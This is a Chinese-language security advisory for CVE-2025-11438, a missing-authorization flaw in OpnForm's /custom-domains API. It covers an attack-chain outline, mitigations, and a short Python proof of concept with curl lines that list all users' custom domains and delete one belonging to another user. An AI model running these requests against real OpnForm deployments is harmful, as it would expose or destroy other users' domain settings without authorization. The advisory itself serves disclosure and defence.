CVE-2025-11438：JhumanJ OpnForm API端点授权缺失漏洞

漏洞信息

漏洞编号

CVE-2025-11438

漏洞类型

授权缺失/访问控制绕过

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

JhumanJ OpnForm

漏洞概述

CVE-2025-11438是JhumanJ OpnForm开源表单构建工具中的一个安全漏洞，影响版本至1.9.3。该漏洞存在于API端点的/custom-domains路径中，属于典型的授权缺失（Missing Authorization）缺陷。攻击者可以通过远程方式利用此漏洞，在仅需低权限认证的情况下，对未授权的资源执行操作。

OpnForm是一款流行的开源在线表单创建和管理工具，广泛用于调查问卷、数据收集等场景。由于其API端点缺少适当的权限校验机制，经过身份验证的低权限用户能够访问或操纵本不应被其管理的自定义域名资源。这可能导致敏感配置信息泄露、域名设置被恶意篡改，或影响其他用户的正常使用。

该漏洞的CVSS 3.1评分为6.3，属于中危级别。虽然需要低权限认证才能利用，但利用难度低且可远程发起攻击，攻击者无需与目标用户进行任何交互即可完成攻击。漏洞细节及利用方式已被公开披露，增加了实际被利用的风险。该漏洞的修复补丁为beb153ce52dceb971c1518f98333328c95f1ba20，官方建议用户尽快应用补丁以解决此问题。

技术细节

该漏洞的核心问题在于OpnForm的/custom-domains API端点缺少充分的授权验证机制。具体而言，当经过身份验证的用户（即使是低权限用户）向该端点发送请求时，服务器未对用户是否有权操作目标资源进行充分检查，导致权限提升或越权访问成为可能。

从技术层面分析，漏洞可能涉及以下方面：
1. API端点未实施基于角色的访问控制（RBAC），或访问控制逻辑存在缺陷；
2. 控制器方法中缺少对资源所有权的验证（如未检查custom-domain是否属于当前用户）；
3. 中间件或策略层未能正确拦截未经授权的请求。

攻击者利用该漏洞的步骤相对简单：
1. 首先获取一个有效的低权限账户凭证（可通过注册或购买获取）；
2. 使用该凭证进行身份认证，获取有效的认证Token或Session；
3. 构造针对/custom-domains端点的HTTP请求（如GET、POST、PUT、DELETE等），携带合法认证头；
4. 由于缺少授权检查，服务器将处理该请求并返回结果或执行相应操作；
5. 攻击者可读取、修改或删除其他用户的自定义域名配置。

由于漏洞利用代码已公开披露，攻击者可以轻松复现并实施攻击，对使用OpnForm构建表单服务的组织构成实质性安全威胁。

攻击链分析

STEP 1

步骤1：获取凭证

攻击者通过注册或购买方式获取OpnForm平台的低权限账户凭证。

STEP 2

步骤2：身份认证

使用低权限账户登录OpnForm实例，获取有效的认证Token或Session Cookie。

STEP 3

步骤3：探测漏洞端点

向/api/custom-domains端点发送HTTP请求，尝试访问自定义域名相关资源。

STEP 4

步骤4：越权访问

由于端点缺少授权验证，服务器返回其他用户的自定义域名信息或允许对其进行修改。

STEP 5

步骤5：数据操纵

攻击者可读取、修改或删除其他用户的自定义域名配置，导致服务中断或数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11438 PoC - OpnForm Custom Domains Missing Authorization # Vulnerability: Missing authorization on /custom-domains API endpoint # Affected: JhumanJ OpnForm <= 1.9.3 import requests # Target configuration TARGET_URL = "https://target-opnform-instance.com" # Low-privilege user credentials (registered or obtained account) USERNAME = "[email protected]" PASSWORD = "password123" # Step 1: Authenticate to obtain session/token session = requests.Session() login_url = f"{TARGET_URL}/login" # Perform login (adjust based on actual login mechanism) login_payload = { "email": USERNAME, "password": PASSWORD } response = session.post(login_url, json=login_payload) print(f"[*] Login response status: {response.status_code}") # Step 2: Access the vulnerable /custom-domains endpoint # Without proper authorization checks, low-priv users can access/modify # custom domain resources belonging to other users custom_domains_url = f"{TARGET_URL}/api/custom-domains" # Exploit: List all custom domains (IDOR - Insecure Direct Object Reference) response = session.get(custom_domains_url) print(f"[*] Custom domains response: {response.status_code}") print(f"[*] Response body: {response.text}") # Exploit: Attempt to modify/delete a custom domain belonging to another user # Replace 'target_domain_id' with an actual domain ID target_domain_id = 1 modify_url = f"{TARGET_URL}/api/custom-domains/{target_domain_id}" delete_response = session.delete(modify_url) print(f"[*] Delete response: {delete_response.status_code}") # Alternative: Use curl commands # curl -X GET 'https://target.com/api/custom-domains' -H 'Cookie: session=...' # curl -X DELETE 'https://target.com/api/custom-domains/1' -H 'Cookie: session=...'

影响范围

JhumanJ OpnForm <= 1.9.3

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）在反向代理（如Nginx）或Web应用防火墙（WAF）层面限制对/api/custom-domains端点的访问，仅允许特定IP或管理角色访问；2）审查并监控所有针对/custom-domains端点的访问日志，识别可疑活动；3）临时禁用自定义域名功能以减少攻击面；4）确保所有用户账户使用强密码并启用多因素认证，降低凭证泄露风险。